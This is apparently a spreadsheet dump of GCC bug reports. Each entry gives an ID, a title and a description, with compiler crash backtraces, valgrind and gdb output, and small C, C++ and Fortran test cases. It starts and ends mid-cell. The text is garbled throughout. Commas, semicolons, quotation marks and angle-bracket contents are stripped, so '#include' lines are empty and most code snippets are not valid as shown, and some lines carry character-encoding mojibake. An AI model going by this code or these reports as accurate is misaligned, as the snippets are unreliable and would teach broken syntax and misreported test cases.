extern struct _IO_FILE *stdout
extern struct _IO_FILE *stderr
extern int remove (__const char *__filename) __attribute__ ((__nothrow__))
extern int rename (__const char *__old __const char *__new) __attribute__ ((__nothrow__))
extern FILE *tmpfile (void) __asm__ ( tmpfile64)
extern FILE *tmpfile64 (void)
extern char *tmpnam (char *__s) __attribute__ ((__nothrow__))
extern char *tmpnam_r (char *__s) __attribute__ ((__nothrow__))
extern char *tempnam (__const char *__dir __const char *__pfx)
     __attribute__ ((__nothrow__)) __attribute__ ((__malloc__))
extern int fclose (FILE *__stream)
extern int fflush (FILE *__stream)
extern int fflush_unlocked (FILE *__stream)
extern int fcloseall (void)
extern FILE *fopen (__const char *__restrict __filename __const char *__restrict __modes) __asm__ ( fopen64)
extern FILE *freopen (__const char *__restrict __filename __const char *__restrict __modes FILE *__restrict __stream) __asm__ ( freopen64)
extern FILE *fopen64 (__const char *__restrict __filename
        __const char *__restrict __modes)
extern FILE *freopen64 (__const char *__restrict __filename
   __const char *__restrict __modes
   FILE *__restrict __stream)
extern FILE *fdopen (int __fd __const char *__modes) __attribute__ ((__nothrow__))
extern FILE *fopencookie (void *__restrict __magic_cookie
     __const char *__restrict __modes
     _IO_cookie_io_functions_t __io_funcs) __attribute__ ((__nothrow__))
extern FILE *fmemopen (void *__s size_t __len __const char *__modes) __attribute__ ((__nothrow__))
extern FILE *open_memstream (char **__restrict __bufloc
        size_t *__restrict __sizeloc) __attribute__ ((__nothrow__))
extern void setbuf (FILE *__restrict __stream char *__restrict __buf) __attribute__ ((__nothrow__))
extern int setvbuf (FILE *__restrict __stream char *__restrict __buf
      int __modes size_t __n) __attribute__ ((__nothrow__))
extern void setbuffer (FILE *__restrict __stream char *__restrict __buf
         size_t __size) __attribute__ ((__nothrow__))
extern void setlinebuf (FILE *__stream) __attribute__ ((__nothrow__))
extern int fprintf (FILE *__restrict __stream
      __const char *__restrict __format ...)
extern int printf (__const char *__restrict __format ...)
extern int sprintf (char *__restrict __s
      __const char *__restrict __format ...) __attribute__ ((__nothrow__))
extern int vfprintf (FILE *__restrict __s __const char *__restrict __format
       __gnuc_va_list __arg)
extern int vprintf (__const char *__restrict __format __gnuc_va_list __arg)
extern int vsprintf (char *__restrict __s __const char *__restrict __format
       __gnuc_va_list __arg) __attribute__ ((__nothrow__))
extern int snprintf (char *__restrict __s size_t __maxlen
       __const char *__restrict __format ...)
     __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__ 3 4)))
extern int vsnprintf (char *__restrict __s size_t __maxlen
        __const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__ 3 0)))
extern int vasprintf (char **__restrict __ptr __const char *__restrict __f
        __gnuc_va_list __arg)
     __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__ 2 0)))
extern int __asprintf (char **__restrict __ptr
         __const char *__restrict __fmt ...)
     __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__ 2 3)))
extern int asprintf (char **__restrict __ptr
       __const char *__restrict __fmt ...)
     __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__printf__ 2 3)))
extern int vdprintf (int __fd __const char *__restrict __fmt
       __gnuc_va_list __arg)
     __attribute__ ((__format__ (__printf__ 2 0)))
extern int dprintf (int __fd __const char *__restrict __fmt ...)
     __attribute__ ((__format__ (__printf__ 2 3)))
extern int fscanf (FILE *__restrict __stream
     __const char *__restrict __format ...)
extern int scanf (__const char *__restrict __format ...)
extern int sscanf (__const char *__restrict __s
     __const char *__restrict __format ...) __attribute__ ((__nothrow__))
extern int vfscanf (FILE *__restrict __s __const char *__restrict __format
      __gnuc_va_list __arg)
     __attribute__ ((__format__ (__scanf__ 2 0)))
extern int vscanf (__const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__format__ (__scanf__ 1 0)))
extern int vsscanf (__const char *__restrict __s
      __const char *__restrict __format __gnuc_va_list __arg)
     __attribute__ ((__nothrow__)) __attribute__ ((__format__ (__scanf__ 2 0)))
extern int fgetc (FILE *__stream)
extern int getc (FILE *__stream)
extern int getchar (void)
extern int getc_unlocked (FILE *__stream)
extern int getchar_unlocked (void)
extern int fgetc_unlocked (FILE *__stream)
extern int fputc (int __c FILE *__stream)
extern int putc (int __c FILE *__stream)
extern int putchar (int __c)
extern int fputc_unlocked (int __c FILE *__stream)
extern int putc_unlocked (int __c FILE *__stream)
extern int putchar_unlocked (int __c)
extern int getw (FILE *__stream)
extern int putw (int __w FILE *__stream)
extern char *fgets (char *__restrict __s int __n FILE *__restrict __stream)
extern char *gets (char *__s)
extern char *fgets_unlocked (char *__restrict __s int __n
        FILE *__restrict __stream)
extern __ssize_t __getdelim (char **__restrict __lineptr
          size_t *__restrict __n int __delimiter
          FILE *__restrict __stream)
extern __ssize_t getdelim (char **__restrict __lineptr
        size_t *__restrict __n int __delimiter
        FILE *__restrict __stream)
extern __ssize_t getline (char **__restrict __lineptr
       size_t *__restrict __n
       FILE *__restrict __stream)
extern int fputs (__const char *__restrict __s FILE *__restrict __stream)
extern int puts (__const char *__s)
extern int ungetc (int __c FILE *__stream)
extern size_t fread (void *__restrict __ptr size_t __size
       size_t __n FILE *__restrict __stream)
extern size_t fwrite (__const void *__restrict __ptr size_t __size
        size_t __n FILE *__restrict __s)
extern int fputs_unlocked (__const char *__restrict __s
      FILE *__restrict __stream)
extern size_t fread_unlocked (void *__restrict __ptr size_t __size
         size_t __n FILE *__restrict __stream)
extern size_t fwrite_unlocked (__const void *__restrict __ptr size_t __size
          size_t __n FILE *__restrict __stream)
extern int fseek (FILE *__stream long int __off int __whence)
extern long int ftell (FILE *__stream)
extern void rewind (FILE *__stream)
extern int fseeko (FILE *__stream __off64_t __off int __whence) __asm__ ( fseeko64)
extern __off64_t ftello (FILE *__stream) __asm__ ( ftello64)
extern int fgetpos (FILE *__restrict __stream fpos_t *__restrict __pos) __asm__ ( fgetpos6</t>
  </si>
  <si>
    <t>GCC-16158</t>
  </si>
  <si>
    <t>[4.0 Regression] O(N^2) in tree-ssa-pre.c</t>
  </si>
  <si>
    <t>#define F0(i) a[i] = 0
#define F1(a) F0(a##0) F0(a##1) F0(a##2) F0(a##3) F0(a##4) F0(a##5) F0(a##6)
F0(a##7)
#define F2(a) F1(a##0) F1(a##1) F1(a##2) F1(a##3) F1(a##4) F1(a##5) F1(a##6)
F1(a##7)
#define F3(a) F2(a##0) F2(a##1) F2(a##2) F2(a##3) F2(a##4) F2(a##5) F2(a##6)
F2(a##7)
#define F4(a) F3(a##0) F3(a##1) F3(a##2) F3(a##3) F3(a##4) F3(a##5) F3(a##6)
F3(a##7)
void f (int a[])
{
	F4(0)
/* 	F4(1) */
/* 	F4(2) */
}</t>
  </si>
  <si>
    <t>GCC-31296</t>
  </si>
  <si>
    <t>Uninitialized variable in _gfortran_unpack0_char</t>
  </si>
  <si>
    <t>Found by valgrind:
gfortran gfortran.dg/char_unpack_2.f90
valgrind a.out
==20842== Conditional jump or move depends on uninitialised value(s)
==20842==    at 0x4ECB306: unpack_internal (unpack_generic.c:99)
==20842==    by 0x4ECB6AA: _gfortran_unpack0_char (unpack_generic.c:233)
==20842==    by 0x400D11: MAIN__ (in /projects/tob/gcc/gcc/testsuite/gfortran.dg/a.out)
==20842==    by 0x40112B: main (fmain.c:22)</t>
  </si>
  <si>
    <t>GCC-61670</t>
  </si>
  <si>
    <t>ICE on invalid in tree_nop_conversion</t>
  </si>
  <si>
    <t>$ cat au.ii 
template  class A {
A:
  0
}
A a
$ /usr/local/gcc_current/bin/g++ -v              
Using built-in specs.
COLLECT_GCC=/usr/local/gcc_current/bin/g++
COLLECT_LTO_WRAPPER=/usr/local/gcc_current/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/dimhen/src/gcc_current/configure --prefix=/usr/local/gcc_current/ --enable-checking=yesdfrtltree --enable-languages=cc++lto --enable-plugin --enable-version-specific-runtime-libs --enable-static
Thread model: posix
gcc version 4.10.0 20140702 (experimental) [trunk revision 212219] (GCC) 
[dimhen@dim x]$ /usr/local/gcc_current/bin/g++ -c au.ii -o au.o
au.ii:3:3: error: expected '' at end of member declaration
   0
   ^
au.ii: In instantiation of 'class A':
au.ii:6:8:   required from here
au.ii:3:3: error: 'A &gt;::' has incomplete type
au.ii:1:24: note: definition of 'class A' is not complete until the closing brace
 template  class A {
                        ^
au.ii:1:24: internal compiler error: Segmentation fault
0xc4a0ff crash_signal
	/home/dimhen/src/gcc_current/gcc/toplev.c:337
0xe9c214 tree_nop_conversion
	/home/dimhen/src/gcc_current/gcc/tree.c:11667
0xe9c214 tree_strip_nop_conversions(tree_node*)
	/home/dimhen/src/gcc_current/gcc/tree.c:11718
0xe9dc9a integer_zerop(tree_node const*)
	/home/dimhen/src/gcc_current/gcc/tree.c:2114
0x632dbf remove_zero_width_bit_fields
	/home/dimhen/src/gcc_current/gcc/cp/class.c:5255
0x632dbf layout_class_type
	/home/dimhen/src/gcc_current/gcc/cp/class.c:6194
0x63ebcc finish_struct_1(tree_node*)
	/home/dimhen/src/gcc_current/gcc/cp/class.c:6416
0x6118aa instantiate_class_template_1
	/home/dimhen/src/gcc_current/gcc/cp/pt.c:9404
0x6118aa instantiate_class_template(tree_node*)
	/home/dimhen/src/gcc_current/gcc/cp/pt.c:9444
0x6a8533 complete_type(tree_node*)
	/home/dimhen/src/gcc_current/gcc/cp/typeck.c:134
0x586569 start_decl_1(tree_node* bool)
	/home/dimhen/src/gcc_current/gcc/cp/decl.c:4762
0x5af793 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
	/home/dimhen/src/gcc_current/gcc/cp/decl.c:4725
0x69051f cp_parser_init_declarator
	/home/dimhen/src/gcc_current/gcc/cp/parser.c:16827
0x691fd5 cp_parser_simple_declaration
	/home/dimhen/src/gcc_current/gcc/cp/parser.c:11322
0x675c53 cp_parser_block_declaration
	/home/dimhen/src/gcc_current/gcc/cp/parser.c:11203
0x69ddc5 cp_parser_declaration
	/home/dimhen/src/gcc_current/gcc/cp/parser.c:11100
0x69ca88 cp_parser_declaration_seq_opt
	/home/dimhen/src/gcc_current/gcc/cp/parser.c:10986
0x69e313 cp_parser_translation_unit
	/home/dimhen/src/gcc_current/gcc/cp/parser.c:4053
0x69e313 c_parse_file()
	/home/dimhen/src/gcc_current/gcc/cp/parser.c:31811
0x7c9fa2 c_common_parse_file()
	/home/dimhen/src/gcc_current/gcc/c-family/c-opts.c:1115
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-50189</t>
  </si>
  <si>
    <t>[4.5 Regression] Wrong code error in -O2 [-fstrict-enums] compile target independent</t>
  </si>
  <si>
    <t>Created attachment 25105
Test program
The attached test program compiles to wrong code with GCC 4.5.3 (and 4.5.1) when compiled -O2.  GCC 4.6.1 gets it right.
I did some digging and determined that the problem shows up in the -fdump-tree-all output in the .068t.vrp1 dump file the preceding file (.067.mergephi2) is correct.  In the generated code that corresponds to the check_pos method the second compare if (m_timestamp != a_timestamp) is transformed into if (3 == a_timestamp).  If m_timestamp were of time position_t (an enum of range 0..3) that would be correct but m_timestamp is an unsigned int so it can and in our application does have values larger than 3.</t>
  </si>
  <si>
    <t>GCC-5387</t>
  </si>
  <si>
    <t>g++ fails to catch use of private type in template</t>
  </si>
  <si>
    <t xml:space="preserve">	In the testcase below g++ fails to diagnose the use of B::X in the definition
of A::x.
Release:
unknown
Environment:
System: Linux prospero.cambridge.redhat.com 2.4.13-0.5 #1 Sat Nov 3 15:08:02 EST 2001 i686 unknown
Architecture: i686
How-To-Repeat:
  template  struct A {
	  typename T::X x
	  int f() { return T::i }
  }
  class B {
	  typedef int X
	  static int i
  }
  int main()
  {
	  A ab
	  ab.f()
  }</t>
  </si>
  <si>
    <t>GCC-28578</t>
  </si>
  <si>
    <t>A most simple multithreaded program (practically any multithreaded one) causes mudflap violation</t>
  </si>
  <si>
    <t>Here are the exact steps carried out resulting in the violation mudflap violation 1 (unregister) despite this program being absolutely correct. Note also that I have confirmed the identical problem with the gcc trunk -- version 4.2.0 (20060729) as well:
$ cat test.c
#include 
#include 
void* test_thread(void* arg)
{
	printf(\nHello from thread!)
	pthread_exit(NULL)
}
int main()
{
#ifdef _REENTRANT
	printf(\nYes _REENTRANT is defined)
#endif
	pthread_t thread
	int arg = 0
	pthread_create(
	pthread_exit(NULL)
	return 0
}
$ gcc -g -fmudflapth -pthread test.c -lmudflapth
$ ./a.out
*******
mudflap violation 1 (unregister): time=1154562440.431557 ptr=0x67d4e0 size=0
pc=0x6273e9
      /usr/lib/libmudflapth.so.0(__mf_unregister+0x49) [0x6273e9]
      /usr/lib/libmudflapth.so.0(__real_free+0xae) [0x62833e]
      /lib/libdl.so.2 [0xa7051a]
number of nearby objects: 0
Yes _REENTRANT is defined
Hello from thread!</t>
  </si>
  <si>
    <t>vesselinpeev</t>
  </si>
  <si>
    <t>GCC-24932</t>
  </si>
  <si>
    <t>GCC segfault's on strcmp in tree.c:annotate_with_file_line</t>
  </si>
  <si>
    <t>I'm writing a tutorial on a HelloWorld compiler front-end for GCC (http://svn.gna.org/viewcvs/gsc/branches/hello-world/doc/hello.xml) and noticed that a function with statements but no DECL_SOURCE_FILE set seg-faults on  cgraph_finalize_function() because it calls gimple-low.c:lower_function_body() which in turn does:
SET_EXPR_LOCATION (x cfun-&gt;function_end_locus)
however if cfun-&gt;function_end_locus is empty ({NULL 0}) it will call tree.c:annotate_with_file_line() with file=NULL and it will fail on this if:
  if (last_annotated_node
      &amp;&amp; last_annotated_node-&gt;line == line
      &amp;&amp; (last_annotated_node-&gt;file == file
	  || !strcmp (last_annotated_node-&gt;file file)))
because strcmp (last_annotated_node-&gt;file file) with file=NULL will seg-fault.
The attached patch checks if file is NULL before using strcmp.
The program that fails build is: http://svn.gna.org/viewcvs/gsc/branches/hello-world/compiler/hello1.c?rev=551</t>
  </si>
  <si>
    <t>barbieri</t>
  </si>
  <si>
    <t>GCC-17835</t>
  </si>
  <si>
    <t>[4.0 Regression] stage2 compiler is broken because it is built with -fomit-frame-pointer</t>
  </si>
  <si>
    <t>When configuring a compiler for i586-linux bootstrapping fails at: 
./xgcc -B./ -B/usr/local/i586-linux/bin/ -isystem /usr/local/i586-linux/include 
-isystem /usr/local/i586-linux/sys-include -L/home/robert/gcc/build/gcc/../ld 
-O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes 
-Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -g 
-DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. 
-I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include 
-I../../gcc/gcc/../libcpp/include  -DL_gcov_execl -c ../../gcc/gcc/libgcov.c -o 
libgcc/./_gcov_execl.o 
../../gcc/gcc/libgcov.c: In function '__gcov_execl': 
../../gcc/gcc/libgcov.c:613: internal compiler error: Segmentation fault 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
in stage2. 
I found that this happens when stage2 compiler is built with 
-fomit-frame-pointer as it is default for this configuration 
(config/mh-x86omitfp). When this option is removed bootstrapping is fine. 
It seems that -fomit-frame-pointer does produce wrong-code when building stage2 
compiler and thus stage2 compiler is broken. 
Note that this does neither happen for i486-linux nor for i686-linux only for 
i586-linux. Because of that it is essential to specify i586 explicitly when 
trying to reproduce.</t>
  </si>
  <si>
    <t>GCC-4636</t>
  </si>
  <si>
    <t>Error compiling java/net/URL.java:406: Internal error: Segmentation fault</t>
  </si>
  <si>
    <t>ICE Compiling the gcc snapshot since a few days
Output: ....
/windows/gcc/gcc/gcj -B/windows/gcc/i686-pc-linux-gnu/libjava/ -B/windows/gcc/gcc/ --encoding=UTF-8 -fassume-compiled -fclasspath=/windows/gcc/i686-pc-linux-gnu/libjava -L/windows/gcc/i686-pc-linux-gnu/libjava -ffloat-store -g -O2 -MD -MT java/net/URL.lo -MF java/net/URL.d -c java/net/URL.java -fPIC -o java/net/.libs/URL.o
java/net/URL.java: In class `java.net.URL':
java/net/URL.java: In method `java.net.URL.readObject(java.io.ObjectInputStream)':
java/net/URL.java:406: Internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[2]: *** [java/net/URL.lo] Error 1
make[2]: Leaving directory `/windows/gcc/i686-pc-linux-gnu/libjava'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/windows/gcc/i686-pc-linux-gnu/libjava'
make: *** [all-target-libjava] Error 2
Release:
todays gcc cvs-tree
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Compile gcc snapshot</t>
  </si>
  <si>
    <t>GCC-68426</t>
  </si>
  <si>
    <t>Simplification of SPREAD with a derived type element is unimplemented</t>
  </si>
  <si>
    <t>In fixing PR 59910 I mentioned that the patch may not
fix a potential problem with similar code in a PARAMETER.
Dominiq posted
  module m
    implicit none
    type t
      integer :: i
    end type t
    type(t) dimension(2) parameter :: a1  = (/ t(1) t(2) /)
    type(t) dimension(1) parameter :: c = spread ( a1(1) 1 1 )
  end module m
which indeed leads to an ICE   
f951: internal compiler error: in gfc_conv_array_initializer at
fortran/trans-array.c:5704
The problem is that gfc_simplify_spread bails out because
soource-&gt;expr_type == EXPR_STRUCTURE and SPREAD is not
simplified.  This then generates a function and
gfc_conv_array_initializer gets expr-&gt;expt_type==EXPR_FUNCTION
which she can't deal with.
The fix lies in gfc_simplify_spread.</t>
  </si>
  <si>
    <t>GCC-25082</t>
  </si>
  <si>
    <t>Subroutine with RETURN value ICE in gfc_conv_scalarized_array_ref</t>
  </si>
  <si>
    <t>using GNU Fortran 95 (GCC) 4.1.0 20051126 (prerelease)  with '-g -pedantic -std=f95' I get a bad / no diagnostic for the following invalid code:
SUBROUTINE S1(*)
INTEGER :: a(2)
RETURN a
END SUBROUTINE S1</t>
  </si>
  <si>
    <t>GCC-7083</t>
  </si>
  <si>
    <t>ICE using -gstabs with dodgy class derivation</t>
  </si>
  <si>
    <t>gcc -v:
    Reading specs from /tools/gcc/3.1/i686-2.4.7-10/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
    Configured with: ../gcc-3.1/configure --prefix=/tools/gcc/3.1 --exec-prefix=/tools/gcc/3.1/i686-2.4.7-10 --disable-nls --enable-shared
    Thread model: single
    gcc version 3.1
Command line:
    g++ -gstabs -c gcc31bug.cc
Output:
    gcc31bug.cc:5: internal error: Segmentation fault
    Please submit a full bug report
    with preprocessed source if appropriate.
    See  for instructions.
Preprocessed source:
    # 1 gcc31bug.cc
    # 1 
    # 1 
    # 1 gcc31bug.cc
    typedef struct {
        int x
    } A
    class B: public A {
        int y
    }
Notes:
    This is nasty (probably invalid) code but it works
    under -ggdb and probably shouldn't segfault anyway.
Release:
3.1</t>
  </si>
  <si>
    <t>GCC-24202</t>
  </si>
  <si>
    <t>[3.4 Regression] Segfault with #pragma once</t>
  </si>
  <si>
    <t>[ forwarded from http://bugs.debian.org/bug=330857 ]
unpacking the attached tarball and cpp -I.. -I. test.c gives:
% cpp -I.. -I. test.c
# 1 test.c
# 0 
# 1 
# 1 test.c
# 1 ../tao/ORB.h 1
# 1 ../tao/Sequence_T.h 1
# 1 ../tao/Sequence.h 1
# 1 ../tao/Sequence_T.h 1
# 4 ../tao/Sequence.h 2
# 4 ../tao/Sequence_T.h 2
# 1 ../tao/Sequence_T.cpp 1
# 6 ../tao/Sequence_T.h 2
# 1 ../tao/ORB.h 2
# 2 test.c 2
:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-48319</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] [C++0x] Segmentation fault in instantiation of std::is_constructible</t>
  </si>
  <si>
    <t>Source file (bug.cc):
#include 
int main() {
  static_assert( std::is_constructible::value  )
}
Message:
In file included from bug.cc:1:0:
/usr/local/gcc-4.6.0/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0/type_traits: In instantiation of Ã¢â‚¬Ëœconst bool std::__is_constructible_helper::__valueÃ¢â‚¬â„¢:
/usr/local/gcc-4.6.0/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0/type_traits:683:12:   instantiated from Ã¢â‚¬Ëœstd::is_constructibleÃ¢â‚¬â„¢
bug.cc:7:42:   instantiated from here
/usr/local/gcc-4.6.0/lib/gcc/x86_64-unknown-linux-gnu/4.6.0/../../../../include/c++/4.6.0/type_traits:661:71: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-71311</t>
  </si>
  <si>
    <t>[7 Regression] spec2006 test case 416.gamess fails since r235817</t>
  </si>
  <si>
    <t>We currently observe miscompare for x86 (32 and 64 bits) and bisect points to r235817.
No source bisecting yet however</t>
  </si>
  <si>
    <t>GCC-32669</t>
  </si>
  <si>
    <t>[4.3 Regression] Actual argument contains too few elements for dummy argument is triggered for valid code</t>
  </si>
  <si>
    <t>The following piece of code is rejected:
program tfe
implicit none
real dimension(1:4) ::  x
real dimension(0:3) ::  y
real dimension(-1:2) ::  z
call sub(x(:))
call sub(y(:))
call sub(z(:))
contains
  subroutine sub(a)
    implicit none
    realdimension(1:4) :: a
  end subroutine sub
end program tfe
with these error messages:
too_few_elements.f90:10.9:
call sub(y(:))
        1
Warning: Actual argument contains too few elements for dummy argument 'a' (3/4) at (1)
too_few_elements.f90:11.9:
call sub(z(:))
        1
Warning: Actual argument contains too few elements for dummy argument 'a' (2/4) at (1)
Seems like for arrays with the notation x(:) the actual size is miscomputed if they appear as an argument to a subroutine.
Apparently this just happens for arrays whose lower bound is zero or less (yz) while for positive lower bound everything is fine (x).
Also there is no problem if the array is given in the form y(0:3) or just y.
The code above is accepted by gcc 4.1 and 4.2 but rejected by recent 4.3 trunk builds. So it seems to be a regression introduced in 4.3.
The error messages come from interface.c(compare_actual_formal) line 1608. The size of the actual argument is computed by
actual_size = get_expr_storage_size(a-&gt;expr)
Maybe there is a problem in this routine?</t>
  </si>
  <si>
    <t>GCC-79502</t>
  </si>
  <si>
    <t>[c++1z] [[nodiscard]] attribute ignored for class template</t>
  </si>
  <si>
    <t>On r245381 the demonstration program does not complain when compiled.
//------------------------------
template
struct [[nodiscard]] missiles {}
missiles make() { return {} }
int main()
{
    // result value ignored here
    make()
}
//------------------------------</t>
  </si>
  <si>
    <t>GCC-2136</t>
  </si>
  <si>
    <t>g++ seems to disregard '::' in '::delete'</t>
  </si>
  <si>
    <t>#include  
class C {
public:
    int x
    // A lot of stuff that main() should NOT use:
    static char pool [100]	
    void *operator new (size_t float) { return pool }
    void operator delete (void * float) {}
}
int main ()
{
    C	*p = ::new C
    ::delete p     // confused by the presence of C::delete
}
Release:
2.95.2 19991024
Environment:
AIX power-pc
How-To-Repeat:
Attempt to compile the code in the description section</t>
  </si>
  <si>
    <t>GCC-25459</t>
  </si>
  <si>
    <t>[4.2 Regression] builtins.c:6283: ICE: in struct_equiv_block_eq at struct-equiv.c:1149</t>
  </si>
  <si>
    <t>/mnt/gnu/gcc-3.3/objdir/./prev-gcc/xgcc -B/mnt/gnu/gcc-3.3/objdir/./prev-gcc/ -B
/opt/gnu/gcc/gcc-4.2.0/hppa2.0w-hp-hpux11.11/bin/ -c   -g -O2 -DIN_GCC   -W -Wal
l -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-l
ong -Wno-variadic-macros -Wold-style-definition -Wmissing-format-attribute -Werr
or -fno-common   -DHAVE_CONFIG_H -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../
../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include -I/opt/gnu/gcc/gcc-4.2.0
/include  -I../../gcc/gcc/../libdecnumber    ../../gcc/gcc/builtins.c -o builtin
s.o
../../gcc/gcc/builtins.c: In function 'expand_builtin':
../../gcc/gcc/builtins.c:6283: internal compiler error: in struct_equiv_block_eq
 at struct-equiv.c:1149
Please submit a full bug report
with preprocessed source if appropriate.
(gdb) bt
#0  fancy_abort (file=0x89fda4 ../../gcc/gcc/struct-equiv.c line=1149
    function=0x89fe18 struct_equiv_block_eq)
    at ../../gcc/gcc/diagnostic.c:602
#1  0x007ea84c in struct_equiv_block_eq (mode=8723 info=0x7eff1050)
    at ../../gcc/gcc/struct-equiv.c:1149
#2  0x0053a8c8 in try_crossjump_to_edge (mode=8211 e1=0x7a41ae70
    e2=0x7a494d90) at ../../gcc/gcc/cfgcleanup.c:1250
#3  0x0053b96c in try_crossjump_bb (mode=19 bb=0x7ad9b500)
    at ../../gcc/gcc/cfgcleanup.c:1568
#4  0x0053c1f0 in try_optimize_cfg (mode=19) at ../../gcc/gcc/cfgcleanup.c:1757
#5  0x0053c634 in cleanup_cfg (mode=19) at ../../gcc/gcc/cfgcleanup.c:1866
#6  0x0069a6ec in rest_of_handle_stack_adjustments ()
    at ../../gcc/gcc/regmove.c:2512
#7  0x0069a670 in rest_of_handle_stack_adjustments ()
    at ../../gcc/gcc/regmove.c:2506
#8  0x003fbd38 in execute_one_pass (pass=0x40022cf4)
    at ../../gcc/gcc/passes.c:845
#9  0x003fbe54 in execute_pass_list (pass=0x40022cf4)
    at ../../gcc/gcc/passes.c:877
...
(gdb) frame 1
#1  0x007ea84c in struct_equiv_block_eq (mode=8723 info=0x7eff1050)
    at ../../gcc/gcc/struct-equiv.c:1149
1149                gcc_unreachable ()
(gdb) p xi
$1 = 0x7a638540
(gdb) p debug_rtx (xi)
(note 564 562 565 58 (../../gcc/gcc/builtins.c) 5571)
$2 = void
(gdb) p debug_rtx (yi)
(note 484 482 485 51 (../../gcc/gcc/builtins.c) 5565)
$3 = void
(gdb) p debug_rtx_list (xi 3)
(note 564 562 565 58 (../../gcc/gcc/builtins.c) 5571)
(jump_insn 565 564 4759 58 ../../gcc/gcc/builtins.c:5571 (parallel [
            (set (pc)
                (if_then_else (ne (reg:SI 28 %r28)
                        (const_int 0 [0x0]))
                    (label_ref 4546)
                    (pc)))
            (set (reg/v/f:SI 5 %r5 [orig:94 target___4671 ] [94])
                (reg:SI 28 %r28))
        ]) 225 {*pa.md:8722} (insn_list:REG_DEP_TRUE 562 (nil))
    (expr_list:REG_DEAD (reg:SI 28 %r28)
        (expr_list:REG_BR_PROB (const_int 6774 [0x1a76])
            (nil))))
(note 4759 565 4760 59 [bb 59] NOTE_INSN_BASIC_BLOCK)
$4 = void
(gdb) p debug_rtx_list (yi 3)
(note 484 482 485 51 (../../gcc/gcc/builtins.c) 5565)
(jump_insn 485 484 4756 51 ../../gcc/gcc/builtins.c:5565 (parallel [
            (set (pc)
                (if_then_else (ne (reg:SI 28 %r28)
                        (const_int 0 [0x0]))
                    (label_ref 4546)
                    (pc)))
            (set (reg/v/f:SI 5 %r5 [orig:94 target___4671 ] [94])
                (reg:SI 28 %r28))
        ]) 225 {*pa.md:8722} (insn_list:REG_DEP_TRUE 482 (nil))
    (expr_list:REG_DEAD (reg:SI 28 %r28)
        (expr_list:REG_BR_PROB (const_int 6774 [0x1a76])
            (nil))))
(note 4756 485 4757 52 [bb 52] NOTE_INSN_BASIC_BLOCK)
$5 = void
(gdb)</t>
  </si>
  <si>
    <t>GCC-4684</t>
  </si>
  <si>
    <t>Internal compiler error in change_address</t>
  </si>
  <si>
    <t xml:space="preserve">	Gcc crashed on compiling a file from Imagemagick-5.4.0 and asked me to submit a bug report So I do so.
The source code looks rather stange to me. I feel that  the redeclaration
 of a register variable is prehaps not a sound idea. 
I removed as many lines as possible from the source code.
 gcc -DHAVE_CONFIG_H -I../ -I. -I. -I../magick -I.. -I../magick  -D_REENTRANT -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I/usr/local/include -I/usr/local/X11R6.6/include  -g -O2 -Wall -E fits.c
Release:
3.0.1
Environment:
System: SunOS excalibur 5.8 Generic_108528-07 sun4u sparc SUNWSun-Blade-100
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../srcdir/gcc-3.0.1/configure
How-To-Repeat:
# 4 fits.c
# 1 ../magick/magick.h 1
# 19 ../magick/magick.h
# 1 ../magick/magick_config.h 1
# 20 ../magick/magick.h 2
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 1 3
# 14 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
# 1 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdarg.h 1 3
# 43 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdarg.h 3
typedef __builtin_va_list __gnuc_va_list
# 15 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 2 3
# 34 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include/stdio.h 3
#pragma ident @(#)stdio.h	1.78	99/12/08 SMI
# 1 /usr/include/iso/stdio_iso.h 1 3
# 32 /usr/include/iso/stdio_iso.h 3
#pragma ident @(#)stdio_iso.h	1.2	99/10/25 SMI
# 1 /usr/include/sys/feature_tests.h 1 3
# 13 /usr/include/sys/feature_tests.h 3
#pragma ident @(#)feature_tests.h	1.18	99/07/26 SMI
# 1 /usr/include/sys/isa_defs.h 1 3
# 9 /usr/include/sys/isa_defs.h 3
#pragma ident @(#)isa_defs.h	1.20	99/05/04 SMI
# 16 /usr/include/sys/feature_tests.h 2 3
